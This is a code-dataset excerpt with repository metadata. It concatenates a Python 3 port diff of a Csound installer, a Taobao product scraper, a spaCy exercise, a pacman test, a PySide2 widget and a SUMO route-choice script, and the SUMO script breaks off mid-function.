addMD5(concatPath([instDir, src]), linkName)
else:
addMD5(concatPath([instDir, linkName]), linkName)
- print ' %s' % linkName
+ print(' %s' % linkName)
else:
- print ' *** error copying %s' % linkName
+ print(' *** error copying %s' % linkName)
return err
def findFiles(dir, pat):
@@ -218,30 +218,30 @@
makeDir(concatPath([binDir]))
installedBinaries = findFiles(concatPath([instDir, binDir]), '.+')
-if ('csound' in installedBinaries) or ('csound64' in installedBinaries):
+if ('csound5' in installedBinaries) or ('csound64' in installedBinaries):
if 'uninstall-csound5' in installedBinaries:
- print ' *** WARNING: found an already existing installation of Csound'
+ print(' *** WARNING: found an already existing installation of Csound')
tmp = ''
while (tmp != 'yes\n') and (tmp != 'no\n'):
sys.__stderr__.write(
' *** Uninstall it ? Type \'yes\', or \'no\' to quit: ')
tmp = sys.__stdin__.readline()
if tmp != 'yes\n':
- print ' *** Csound installation has been aborted'
- print ''
+ print(' *** Csound installation has been aborted')
+ print('')
raise SystemExit(1)
- print ' --- Removing old Csound installation...'
+ print(' --- Removing old Csound installation...')
runCmd([concatPath([instDir, binDir, 'uninstall-csound5'])])
- print ''
+ print('')
else:
- print ' *** Error: an already existing installation of Csound was found'
- print ' *** Try removing it first, and then run this script again'
- print ''
+ print(' *** Error: an already existing installation of Csound was found')
+ print(' *** Try removing it first, and then run this script again')
+ print('')
raise SystemExit(1)
# copy binaries
-print ' === Installing executables ==='
+print(' === Installing executables ===')
for i in exeFiles1:
if findFiles('.', i).__len__() > 0:
err = installXFile('--strip-unneeded', i, binDir)
@@ -253,7 +253,7 @@
# copy libraries
-print ' === Installing libraries ==='
+print(' === Installing libraries ===')
libList = findFiles('.', 'libcsound\\.a')
libList += findFiles('.', 'libcsound64\\.a')
libList += findFiles('.', 'libcsound\\.so\\..+')
@@ -280,7 +280,7 @@
# copy plugin libraries
-print ' === Installing plugins ==='
+print(' === Installing plugins ===')
if not useDouble:
pluginDir = pluginDir32
else:
@@ -297,13 +297,13 @@
# copy header files
-print ' === Installing header files ==='
+print(' === Installing header files ===')
err = installFiles(headerFiles, includeDir)
installErrors = installErrors or err
# copy language interfaces
-print ' === Installing language interfaces ==='
+print(' === Installing language interfaces ===')
wrapperList = [['csnd\\.py', '0', pythonDir],
['loris\\.py', '0', pythonDir],
['CsoundVST\\.py', '0', pythonDir],
@@ -327,7 +327,7 @@
# copy XMG files
-print ' === Installing Localisation files ==='
+print(' === Installing Localisation files ===')
xmgList = findFiles('.', '.+\\.xmg')
if xmgList.__len__() > 0:
err = installFiles(xmgList, xmgDir)
@@ -341,34 +341,34 @@
err = runCmd(['install', '-p', '-m', '0644', src, fileName])
if err == 0:
addMD5(fileName, fileName)
- print ' %s' % fileName
+ print(' %s' % fileName)
else:
- print ' *** error copying %s' % fileName
+ print(' *** error copying %s' % fileName)
installErrors = installErrors or err
# Copy documentation
-print ' === Installing documentation ==='
+print(' === Installing documentation ===')
err = installFiles(docFiles, docDir)
installErrors = installErrors or err
# copy Tcl/Tk files
-print ' === Installing Tcl/Tk modules and scripts ==='
+print(' === Installing Tcl/Tk modules and scripts ===')
if findFiles('.', 'tclcsound\\.so').__len__() > 0:
err = installXFile('--strip-unneeded', 'tclcsound.so', tclDir)
installErrors = installErrors or err
err = installFile('frontends/tclcsound/command_summary.txt', tclDir)
installErrors = installErrors or err
-err = installFile('nsliders.tk', tclDir)
-installErrors = installErrors or err
-err = installXFile('', 'matrix.tk', binDir)
+ err = installFile('nsliders.tk', tclDir)
+ installErrors = installErrors or err
+ err = installXFile('', 'matrix.tk', binDir)
installErrors = installErrors or err
# copy STK raw wave files
if '%s/libstk.so' % pluginDir in fileList:
- print ' === Installing STK raw wave files ==='
+ print(' === Installing STK raw wave files ===')
rawWaveFiles = []
for fName in os.listdir('./Opcodes/stk/rawwaves'):
if re.match('^.*\.raw$', fName) != None:
@@ -397,11 +397,11 @@
except:
pdDir = ''
if pdDir != '':
- print ' === Installing csoundapi~ PD object ==='
+ print(' === Installing csoundapi~ PD object ===')
err = installXFile('--strip-unneeded', 'csoundapi~.pd_linux', pdDir)
if err == 0:
try:
- os.chmod(concatPath([instDir, pdDir, 'csoundapi~.pd_linux']), 0644)
+ os.chmod(concatPath([instDir, pdDir, 'csoundapi~.pd_linux']), 0o644)
except:
err = -1
installErrors = installErrors or err
@@ -409,7 +409,7 @@
# copy VIM files if enabled
if vimDir != '':
- print ' === Installing VIM syntax files ==='
+ print(' === Installing VIM syntax files ===')
err = installXFile('', 'installer/misc/vim/cshelp', binDir)
installErrors = installErrors or err
err = installFile('installer/misc/vim/csound.vim',
@@ -420,71 +420,31 @@
'%s/%s' % (vimDir, 'syntax'))
installErrors = installErrors or err
-# create uninstall script
-
-print ' === Installing uninstall script ==='
-fileList += [concatPath([prefix, md5Name])]
-fileList += [concatPath([binDir, 'uninstall-csound5'])]
-try:
- f = open(concatPath([instDir, binDir, 'uninstall-csound5']), 'w')
- print >> f, '#!/bin/sh'
- print >> f, ''
- for i in fileList:
- print >> f, 'rm -f "%s"' % i
- print >> f, ''
- print >> f, '/sbin/ldconfig > /dev/null 2> /dev/null'
- print >> f, ''
- f.close()
- os.chmod(concatPath([instDir, binDir, 'uninstall-csound5']), 0755)
- addMD5(concatPath([instDir, binDir, 'uninstall-csound5']),
- concatPath([binDir, 'uninstall-csound5']))
- print ' %s' % concatPath([binDir, 'uninstall-csound5'])
-except:
- print ' *** Error creating uninstall script'
- installErrors = 1
-
-# save MD5 checksums
-
-print ' === Installing MD5 checksums ==='
-try:
- f = open(concatPath([instDir, prefix, md5Name]), 'w')
- print >> f, md5List,
- f.close()
- os.chmod(concatPath([instDir, prefix, md5Name]), 0644)
- print ' %s' % concatPath([prefix, md5Name])
-except:
- print ' *** Error installing MD5 checksums'
- installErrors = 1
-
-
# -----------------------------------------------------------------------------
-print ''
+print('')
# check for errors
if installErrors:
- print ' *** Errors occured during installation, deleting files...'
+ print(' *** Errors occured during installation, deleting files...')
for i in fileList:
try:
os.remove(concatPath([instDir, i]))
except:
pass
else:
- print 'Csound installation has been successfully completed.'
- print 'Before running Csound, make sure that the following environment'
- print 'variables are set:'
+ print('Csound installation has been successfully completed.')
+ print('Before running Csound, make sure that the following environment')
+ print('variables are set:')
if not useDouble:
- print ' OPCODEDIR=%s' % pluginDir32
+ print(' OPCODEDIR=%s' % pluginDir32)
else:
- print ' OPCODEDIR64=%s' % pluginDir64
- print ' CSSTRNGS=%s' % xmgDir
+ print(' OPCODEDIR64=%s' % pluginDir64)
+ print(' CSSTRNGS=%s' % xmgDir)
if '%s/libstk.so' % pluginDir in fileList:
- print ' RAWWAVE_PATH=%s' % rawWaveDir
- print 'Csound can be uninstalled by running %s/uninstall-csound5' % binDir
-
-if os.getuid() == 0:
- runCmd(['/sbin/ldconfig'])
+ print(' RAWWAVE_PATH=%s' % rawWaveDir)
+ print('Csound can be uninstalled by running %s/uninstall-csound5' % binDir)
-print ''
+print('')
| 33.770308 | 82 | 0.59066 |
8693702852c39352bd17eaf0f2b7cd42ca1c63b4
| 4,301 |
py
|
Python
|
search_good_info_new.py
|
sambabypapapa/CralwerSet
|
a76e0660c42ce7aac20b8d07ccc454b6636a8a2a
|
[
"Apache-2.0"
] | 5 |
2020-08-17T08:37:16.000Z
|
2021-06-07T05:02:05.000Z
|
search_good_info_new.py
|
sambabypapapa/CralwerSet
|
a76e0660c42ce7aac20b8d07ccc454b6636a8a2a
|
[
"Apache-2.0"
] | null | null | null |
search_good_info_new.py
|
sambabypapapa/CralwerSet
|
a76e0660c42ce7aac20b8d07ccc454b6636a8a2a
|
[
"Apache-2.0"
] | 1 |
2021-06-07T05:02:10.000Z
|
2021-06-07T05:02:10.000Z
|
"""
功能:爬取多元化商品池所有商品;
环境:python3
作者:百舸
"""
import requests
import datetime
from requests.packages import urllib3
import json
import CralwerSet.connect_mysql as connect_mysql
import threading
import time
import CralwerSet.schedule as schedule
import pymysql
import CralwerSet.badou_essay_list_crawl as badou_essay_list_crawl
def comment(sc):
# while True:
# try:
conn = connect_mysql.w_shark_erp()
cur = conn.cursor()
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3724.8 Safari/537.36'}
isNew7 = False
while True:
try:
info = sc.pop()
except IndexError:
cur.close()
conn.close()
return
for i in range(0, 2500, 25):
url = f'https://kxuan.taobao.com/searchSp.htm?data-key=s&data-value=25&ajax=true&_ksTS=1575682938492_769&callback=jsonp770&ruletype=2&bcoffset=2&navigator=all&nested=we&is_spu=0&1=1&ntoffset=0&s={i}&kxuan_swyt_item=37662&cat={info[0]}&searchtype=item&uniq=pid&id=4525&enginetype=0&bcoffset=2&ntoffset=0'
while True:
try:
page_text = requests.get(url=url, headers=header, verify=False).text
break
except Exception as e:
print(e)
continue
string = page_text.split("(", 1)[1][:-1]
result = json.loads(string)
goods = result['mods']['itemlist']['data']['auctions']
goods_info = []
for good in goods:
if int(good['nid']) in have_list:
continue
icon = []
for each in good['icon']:
icon.append({"icon_key":each['icon_key'],"innerText":each['innerText'],"position":each['position']})
if each['innerText'] == '营销':
isNew7 = True
have_list.append(int(good['nid']))
if not isNew7:
isNew7 = False
continue
try:
sameStyleCount = good['sameStyleCount']
except KeyError:
sameStyleCount = 0
goods_info.append((info[2], good['nid'], good['raw_title'], good['detail_url'],
good['view_sales'].strip('人付款'), json.dumps(icon, ensure_ascii=False), good['nick'],
good['shopLink'], good['q_score'], good['pic_url'],
good['view_price'], json.dumps(good["shopcard"]), sameStyleCount))
while True:
try:
sql = "insert into cm_commodity_new (CLASSIFY_ID, URL_ID,TITLE,URL,SALES,CREATE_DATE,ICON,NICK,SHOPLINK,Q_SCORE,PIC_URL,PRICE,SHOPCARD,SAMESTYLECOUNT) values (%s,%s,%s,%s,%s,NOW(),%s,%s,%s,%s,%s,%s,%s,%s);"
num = cur.executemany(sql, goods_info)
conn.commit()
print(info[1], i - 25, '-', i, datetime.datetime.now(), '更新了', num, '条')
break
except pymysql.err.OperationalError:
print('由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。')
conn.ping(True)
if len(goods) < 25:
break
# except:
# continue
if __name__ == '__main__':
while True:
try:
conn = connect_mysql.w_shark_erp()
cur = conn.cursor()
sql = "select DISTINCT(URL_ID) from cm_commodity_new;"
cur.execute(sql)
have_list = []
for each in cur.fetchall():
have_list.append(each[0])
urllib3.disable_warnings()
Schedule = schedule.schedule('select distinct(ID),cat,MAIN_ID from class_id order by ID desc;',
connect_mysql.w_shark_erp())
thread_list = []
for i in range(6):
thread_list.append(threading.Thread(target=comment, args=(Schedule,)))
for thread in thread_list:
thread.start()
time.sleep(1)
for thread in thread_list:
thread.join()
except:
continue
| 37.72807 | 315 | 0.527087 |
86e3001fd4adfb850bc3a09937532548227d1017
| 906 |
py
|
Python
|
exercises/ja/solution_03_07.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | 2 |
2020-07-07T01:46:37.000Z
|
2021-04-20T03:19:43.000Z
|
exercises/ja/solution_03_07.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/ja/solution_03_07.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
import spacy
from spacy.language import Language
from spacy.matcher import PhraseMatcher
from spacy.tokens import Span
nlp = spacy.load("ja_core_news_sm")
animals = ["ゴールデンレトリバー", "ネコ", "カメ", "ドブネズミ"]
animal_patterns = list(nlp.pipe(animals))
print("動物の一覧: ", animal_patterns)
matcher = PhraseMatcher(nlp.vocab)
matcher.add("ANIMAL", None, *animal_patterns)
# カスタムコンポーネントを定義
@Language.component("animal_component")
def animal_component_function(doc):
# matcherをdocに適用
matches = matcher(doc)
# マッチした結果に対してSpanを作り、"ANIMAL"のラベルを付ける
spans = [Span(doc, start, end, label="ANIMAL") for match_id, start, end in matches]
# doc.entsにマッチ結果のスパンを追加
doc.ents = spans
return doc
# 「ner」コンポーネントのあとに追加
nlp.add_pipe("animal_component", after="ner")
print(nlp.pipe_names)
# テキストを処理し、doc.entsの文字列とラベルを表示
doc = nlp("私はネコとゴールデンレトリバーを飼っている。")
print([(ent.text, ent.label_) for ent in doc.ents])
| 28.3125 | 87 | 0.745033 |
be27fd4c08d298cd50a0a9b327b9a00ec468166e
| 441 |
py
|
Python
|
pacman-arch/test/pacman/tests/remove041.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/remove041.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/remove041.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Remove a no longer needed package (multiple provision)"
lp1 = pmpkg("pkg1")
lp1.provides = ["imaginary"]
self.addpkg2db("local", lp1)
lp2 = pmpkg("pkg2")
lp2.provides = ["imaginary"]
self.addpkg2db("local", lp2)
lp3 = pmpkg("pkg3")
lp3.depends = ["imaginary"]
self.addpkg2db("local", lp3)
self.args = "-R %s" % lp1.name
self.addrule("PACMAN_RETCODE=0")
self.addrule("!PKG_EXIST=pkg1")
self.addrule("PKG_EXIST=pkg2")
| 22.05 | 75 | 0.70068 |
07a2db1851d29ca80e67df7768a13848d0db9404
| 1,966 |
py
|
Python
|
packages/geometry/nodes/geometry___PointsField0/widgets/geometry___PointsField0___main_widget.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
packages/geometry/nodes/geometry___PointsField0/widgets/geometry___PointsField0___main_widget.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
packages/geometry/nodes/geometry___PointsField0/widgets/geometry___PointsField0___main_widget.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
# from PySide2.QtWidgets import ...
from PySide2.QtCore import Qt
from PySide2.QtGui import QPixmap, QPainter, QPen, QColor, QBrush
from PySide2.QtWidgets import QWidget, QVBoxLayout, QLabel
import random
class PointsField_NodeInstance_MainWidget(QWidget):
def __init__(self, parent_node_instance):
super(PointsField_NodeInstance_MainWidget, self).__init__()
# leave these lines ------------------------------
self.parent_node_instance = parent_node_instance
# ------------------------------------------------
self.setStyleSheet('''
background-color: #333333;
''')
self.setLayout(QVBoxLayout())
self.label = QLabel()
pix = QPixmap(200,200)
self.label.setPixmap(pix)
self.layout().addWidget(self.label)
self.resize(200, 200)
self.points = []
def randomize(self, num_points):
self.points.clear()
for i in range(num_points):
x = random.randint(0, self.label.pixmap().width())
y = random.randint(0, self.label.pixmap().height())
self.points.append({'x': x, 'y': y})
self.draw_points(self.points)
return self.points
def draw_points(self, points):
painter = QPainter(self.label.pixmap())
painter.setRenderHint(QPainter.Antialiasing)
painter.setPen(QPen('#333333'))
painter.setBrush(QColor('#333333'))
painter.drawRect(self.rect())
pen = QPen(QColor(255, 255, 255))
painter.setPen(pen)
painter.setBrush(QBrush(Qt.white))
for p in points:
painter.drawEllipse(p['x'], p['y'], 4, 4)
self.repaint()
def get_data(self):
return {'points': self.points}
def set_data(self, data):
self.points = data['points']
self.draw_points(self.points)
# optional - important for threading - stop everything here
def removing(self):
pass
| 27.690141 | 67 | 0.5941 |
ed63d4d83c087e768a6ffc8f116f1047c1b8ba40
| 23,069 |
py
|
Python
|
Co-Simulation/Sumo/sumo-1.7.0/tools/assign/routeChoices.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 4 |
2020-11-13T02:35:56.000Z
|
2021-03-29T20:15:54.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/assign/routeChoices.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 9 |
2020-12-09T02:12:39.000Z
|
2021-02-18T00:15:28.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/assign/routeChoices.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 1 |
2020-11-20T19:31:26.000Z
|
2020-11-20T19:31:26.000Z
|
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2007-2020 German Aerospace Center (DLR) and others.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# https://www.eclipse.org/legal/epl-2.0/
# This Source Code may also be made available under the following Secondary
# Licenses when the conditions for such availability set forth in the Eclipse
# Public License 2.0 are satisfied: GNU General Public License, version 2
# or later which is available at
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later
# @file routeChoices.py
# @author Evamarie Wiessner
# @author Yun-Pang Floetteroed
# @author Michael Behrisch
# @date 2007-02-27
"""
This script is to calculate the route choice probabilities based on different methods.
- Gawron
- step-size (TBD)
- ......
"""
from __future__ import absolute_import
from __future__ import print_function
import os
import random
import math
from xml.sax import handler
from xml.sax import parse
class Vehicle:
def __init__(self, label, depart, departlane='first', departpos='base', departspeed=0):
self.label = label
self.CO_abs = 0.
self.CO2_abs = 0.
self.HC_abs = 0.
self.PMx_abs = 0.
self.NOx_abs = 0.
self.fuel_abs = 0.
self.routesList = []
# self.speed = 0.
self.depart = float(depart)
self.departlane = departlane
self.departpos = departpos
self.departspeed = departspeed
self.selectedRoute = None
class Edge:
def __init__(self, label):
self.label = label
self.length = 0.
self.freespeed = 0.
self.CO_abs = 0.
self.CO2_abs = 0.
self.HC_abs = 0.
self.PMx_abs = 0.
self.NOx_abs = 0.
self.fuel_abs = 0.
self.traveltime = 0.
self.CO_perVeh = 0.
self.CO2_perVeh = 0.
self.HC_perVeh = 0.
self.PMx_perVeh = 0.
self.NOx_perVeh = 0.
self.fuel_perVeh = 0.
# only one veh on the edge
self.fuel_perVeh_default = 0.
self.CO_perVeh_default = 0.
self.CO2_perVeh_default = 0.
self.HC_perVeh_default = 0.
self.PMx_perVeh_default = 0.
self.NOx_perVeh_default = 0.
self.fuel_perVeh_default = 0.
self.freetraveltime = 0.
pathNum = 0
class Route:
def __init__(self, edges):
global pathNum
self.label = "%s" % pathNum
pathNum += 1
self.edges = edges
# self.ex_probability = None
self.probability = 0.
self.selected = False
self.ex_cost = 0.
self.act_cost = 0.
class netReader(handler.ContentHandler):
def __init__(self, edgesList, edgesMap):
self._edgesList = edgesList
self._edgesMap = edgesMap
self._edgeObj = None
def startElement(self, name, attrs):
if name == 'edge' and 'function' not in attrs:
if attrs['id'] not in self._edgesMap:
self._edgeObj = Edge(attrs['id'])
self._edgesList.append(self._edgeObj)
self._edgesMap[attrs['id']] = self._edgeObj
if self._edgeObj and name == 'lane':
self._edgeObj.length = float(attrs['length'])
self._edgeObj.freespeed = float(attrs['speed'])
self._edgeObj.freetraveltime = self._edgeObj.length / \
self._edgeObj.freespeed
def endElement(self, name):
if name == 'edge':
self._edgeObj = None
class addweightsReader(handler.ContentHandler):
def __init__(self, edgesList, edgesMap):
self._edgesList = edgesList
self._edgesMap = edgesMap
self._edgObj = None
def startElement(self, name, attrs):
if name == 'edge':
if attrs['id'] in self._edgesMap:
self._edgeObj = self._edgesMap[attrs['id']]
if 'traveltime' in attrs:
self._edgeObj.freetraveltime = float(attrs['traveltime'])
if 'CO_perVeh' in attrs:
self._edgeObj.CO_perVeh_default = float(attrs['CO_perVeh'])
if 'CO2_perVeh' in attrs:
self._edgeObj.CO2_perVeh_default = float(attrs['CO2_perVeh'])
if 'HC_perVeh' in attrs:
self._edgeObj.HC_perVeh_default = float(attrs['HC_perVeh'])
if 'PMx_perVeh' in attrs:
self._edgeObj.PMx_perVeh_default = float(attrs['PMx_perVeh'])
if 'NOx_perVeh' in attrs:
self._edgeObj.NOx_perVeh_default = float(attrs['NOx_perVeh'])
if 'fuel_perVeh' in attrs:
self._edgeObj.fuel_perVeh_default = float(attrs['fuel_perVeh'])
if 'fuel_abs' in attrs:
self._edgeObj.fuel_abs_default = float(attrs['fuel_abs'])
if 'NOx_abs' in attrs:
self._edgeObj.NOx_abs_default = float(attrs['NOx_abs'])
if 'PMx_abs' in attrs:
self._edgeObj.PMx_abs_default = float(attrs['PMx_abs'])
if 'HC_abs' in attrs:
self._edgeObj.HC_abs_default = float(attrs['HC_abs'])
if 'CO2_abs' in attrs:
self._edgeObj.CO2_abs_default = float(attrs['CO2_abs'])
if 'CO_abs' in attrs:
self._edgeObj.CO_abs_default = float(attrs['CO_abs'])
class routeReader(handler.ContentHandler):
def __init__(self, vehList, vehMap):
self._vehList = vehList
self._vehMap = vehMap
self._vehObj = None
self._routObj = None
def startElement(self, name, attrs):
if name == 'vehicle':
if ('departPos' in attrs):
self._vehObj = Vehicle(attrs['id'], attrs['depart'], attrs[
'departLane'], attrs['departPos'], attrs['departSpeed'])
else:
self._vehObj = Vehicle(attrs['id'], attrs['depart'])
self._vehMap[attrs['id']] = self._vehObj
self._vehList.append(self._vehObj)
if self._vehObj and name == 'route':
edgesList = attrs['edges'].split(' ')
self._routObj = Route(" ".join(edgesList))
self._vehObj.routesList.append(self._routObj)
def endElement(self, name):
if name == 'vehicle':
self._vehObj = None
self._routObj = None
class vehrouteReader(handler.ContentHandler):
def __init__(self, vehList, vehMap, edgesMap, fout, foutrout, ecoMeasure, alpha, beta):
self._vehList = vehList
self._vehMap = vehMap
self._edgesMap = edgesMap
self._fout = fout
self._foutrout = foutrout
self._ecoMeasure = ecoMeasure
self._newroutesList = []
self._alpha = alpha
self._beta = beta
self._vehObj = None
self._routObj = None
self._selected = None
self._currentSelected = None
self._count = 0
self._existed = False
def startElement(self, name, attrs):
if name == 'vehicle':
self._vehObj = self._vehMap[attrs['id']]
if self._vehObj and name == 'routeDistribution':
self._currentSelected = attrs['last']
if self._vehObj and name == 'route':
if self._count == int(self._currentSelected):
self._vehObj.selectedRouteEdges = attrs['edges']
self._count += 1
for r in self._vehObj.routesList:
if r.edges == attrs['edges']:
self._existed = True
self._routObj = r
break
if not self._existed:
self._routObj = Route(attrs['edges'])
self._vehObj.routesList.append(self._routObj)
if 'probability' in attrs:
self._routObj.probability = float(attrs['probability'])
if self._routObj.probability == 0.0:
# check with Micha if there is a better way to avoid the
# prob. = 0.
self._routObj.probability = 1.02208127529e-16
if 'cost' in attrs:
self._routObj.ex_cost = float(attrs['cost'])
for e in self._routObj.edges.split(' '):
eObj = self._edgesMap[e]
if self._ecoMeasure != 'fuel' and eObj.traveltime == 0.:
self._routObj.act_cost += eObj.freetraveltime
elif self._ecoMeasure != 'fuel' and eObj.traveltime > 0.:
self._routObj.act_cost += eObj.traveltime
elif self._ecoMeasure == 'fuel' and eObj.fuel_perVeh == 0.:
self._routObj.act_cost += eObj.fuel_perVeh_default
elif self._ecoMeasure == 'fuel' and eObj.fuel_perVeh > 0.:
self._routObj.act_cost += eObj.fuel_perVeh
if self._routObj.ex_cost == 0.:
self._routObj.ex_cost = self._routObj.act_cost
def endElement(self, name):
if name == 'vehicle':
# if len(self._vehObj.routesList) == 1:
# self._vehObj.routesList[0].probability = 1.
# for the routes which are from the sumo's rou.alt.xml file
for r in self._vehObj.routesList:
if r.act_cost == 0.:
for e in r.edges.split(' '):
eObj = self._edgesMap[e]
if self._ecoMeasure != 'fuel' and eObj.traveltime == 0.:
r.act_cost += eObj.freetraveltime
elif self._ecoMeasure != 'fuel' and eObj.traveltime > 0.:
r.act_cost += eObj.traveltime
elif self._ecoMeasure == 'fuel' and eObj.fuel_perVeh == 0.:
r.act_cost += eObj.fuel_perVeh_default
elif self._ecoMeasure == 'fuel' and eObj.fuel_perVeh > 0.:
r.act_cost += eObj.fuel_perVeh
if r.ex_cost == 0.:
r.ex_cost = r.act_cost
# calcuate the probabilites for the new routes
if not r.probability:
r.probability = 1. / float(len(self._vehObj.routesList))
print('new probability for route', r.label,
'for veh', self._vehObj.label)
self._newroutesList.append(r)
# adjust the probabilites of the existing routes due to the new
# routes
if len(self._newroutesList) > 0:
addProb = 0.
origProbSum = 0.
for r in self._vehObj.routesList:
if r in self._newroutesList:
addProb += r.probability
else:
origProbSum += r.probability
for r in self._vehObj.routesList:
if r not in self._newroutesList:
r.probability = r.probability / \
origProbSum * (1. - addProb)
# update the costs of routes not used by the driver
for r in self._vehObj.routesList:
if r.edges != self._vehObj.selectedRouteEdges:
r.act_cost = self._beta * r.act_cost + \
(1. - self._beta) * r.ex_cost
# calcuate the route choice probabilities based on Gawron
# todo: add "one used route to all routes"
for r1 in self._vehObj.routesList:
for r2 in self._vehObj.routesList:
if r1.label != r2.label:
gawron(r1, r2, self._alpha)
# decide which route will be selected
randProb = random.random()
if len(self._vehObj.routesList) == 1:
self._vehObj.routesList[0].probability = 1.
self._selected = 0
else:
cumulatedProbs = 0.
for i, r in enumerate(self._vehObj.routesList):
cumulatedProbs += r.probability
if cumulatedProbs >= randProb:
self._selected = i
break
# generate the *.rou.xml
self._foutrout.write(' <vehicle id="%s" depart="%.2f" departLane="%s" departPos="%s" departSpeed="%s">\n'
% (self._vehObj.label, self._vehObj.depart, self._vehObj.departlane,
self._vehObj.departpos, self._vehObj.departspeed))
self._foutrout.write(
' <route edges="%s"/>\n' % self._vehObj.routesList[self._selected].edges)
self._foutrout.write(' </vehicle> \n')
# generate the *.rou.alt.xml
self._fout.write(' <vehicle id="%s" depart="%.2f" departLane="%s" departPos="%s" departSpeed="%s">\n'
% (self._vehObj.label, self._vehObj.depart, self._vehObj.departlane,
self._vehObj.departpos, self._vehObj.departspeed))
self._fout.write(
' <routeDistribution last="%s">\n' % self._selected)
for route in self._vehObj.routesList:
self._fout.write(' <route cost="%.4f" probability="%s" edges="%s"/>\n' % (
route.act_cost, route.probability, route.edges))
self._fout.write(' </routeDistribution>\n')
self._fout.write(' </vehicle> \n')
self._newroutesList = []
self._vehObj = None
self._selected = None
self._currentSelected = None
self._count = 0
if name == 'route':
self._routObj = None
if (name == 'route-alternatives' or name == 'routes'):
self._fout.write('</route-alternatives>\n')
self._fout.close()
self._foutrout.write('</routes>\n')
self._foutrout.close()
class dumpsReader(handler.ContentHandler):
def __init__(self, edgesList, edgesMap):
self._edgesList = edgesList
self._edgeObj = None
self._edgesMap = edgesMap
def startElement(self, name, attrs):
if name == 'edge':
if attrs['id'] not in self._edgesMap:
self._edgeObj = Edge(attrs['id'])
self._edgesList.append(self._edgeObj)
self._edgesMap[attrs['id']] = self._edgeObj
else:
self._edgeObj = self._edgesMap[attrs['id']]
if 'traveltime' in attrs:
self._edgeObj.traveltime = float(attrs['traveltime'])
if 'CO_perVeh' in attrs:
self._edgeObj.CO_perVeh = float(attrs['CO_perVeh'])
if 'CO2_perVeh' in attrs:
self._edgeObj.CO2_perVeh = float(attrs['CO2_perVeh'])
if 'HC_perVeh' in attrs:
self._edgeObj.HC_perVeh = float(attrs['HC_perVeh'])
if 'PMx_perVeh' in attrs:
self._edgeObj.PMx_perVeh = float(attrs['PMx_perVeh'])
if 'NOx_perVeh' in attrs:
self._edgeObj.NOx_perVeh = float(attrs['NOx_perVeh'])
if 'fuel_perVeh' in attrs:
self._edgeObj.fuel_perVeh = float(attrs['fuel_perVeh'])
if 'fuel_abs' in attrs:
self._edgeObj.fuel_abs = float(attrs['fuel_abs'])
if 'NOx_abs' in attrs:
self._edgeObj.NOx_abs = float(attrs['NOx_abs'])
if 'PMx_abs' in attrs:
self._edgeObj.PMx_abs = float(attrs['PMx_abs'])
if 'HC_abs' in attrs:
self._edgeObj.HC_abs = float(attrs['HC_abs'])
if 'CO2_abs' in attrs:
self._edgeObj.CO2_abs = float(attrs['CO2_abs'])
if 'CO_abs' in attrs:
self._edgeObj.CO_abs = float(attrs['CO_abs'])
def endElement(self, name):
if name == 'edge':
self._edgeObj = None
def resetEdges(edgesMap):
for eid in edgesMap:
e = edgesMap[eid]
e.traveltime = 0.
e.CO_abs = 0.
e.CO2_abs = 0.
e.HC_abs = 0.
e.PMx_abs = 0.
e.NOx_abs = 0.
e.fuel_abs = 0.
e.CO_perVeh = 0.
e.CO2_perVeh = 0.
e.HC_perVeh = 0.
e.PMx_perVeh = 0.
e.NOx_perVeh = 0.
e.fuel_perVeh = 0.
# check with Micha
def getRouteChoices(edgesMap, dumpfile, routeAltfile, netfile, addWeightsfile, alpha, beta, step, ecoMeasure=None):
random.seed(42) # check with micha
edgesList = []
vehList = []
vehMap = {}
print('run getRouteChoices')
print('ecoMeasure:', ecoMeasure)
outputPath = os.path.abspath(routeAltfile)
outputPath = os.path.dirname(outputPath)
prefix = os.path.basename(routeAltfile)
# prefix = prefix[:prefix.find('.')]
prefix = prefix[:-12]
# print('outputPath:', outputPath)
print('prefix:', prefix)
outputAltfile = os.path.join(outputPath, prefix + '.rou.galt.xml')
outputRoufile = os.path.join(outputPath, prefix + '.grou.xml')
if len(edgesMap) == 0:
try:
print('parse network file')
parse(netfile, netReader(edgesList, edgesMap))
except AttributeError:
print("could not parse netfile: " + str(netfile))
try:
parse(addWeightsfile, addweightsReader(edgesList, edgesMap))
except AttributeError:
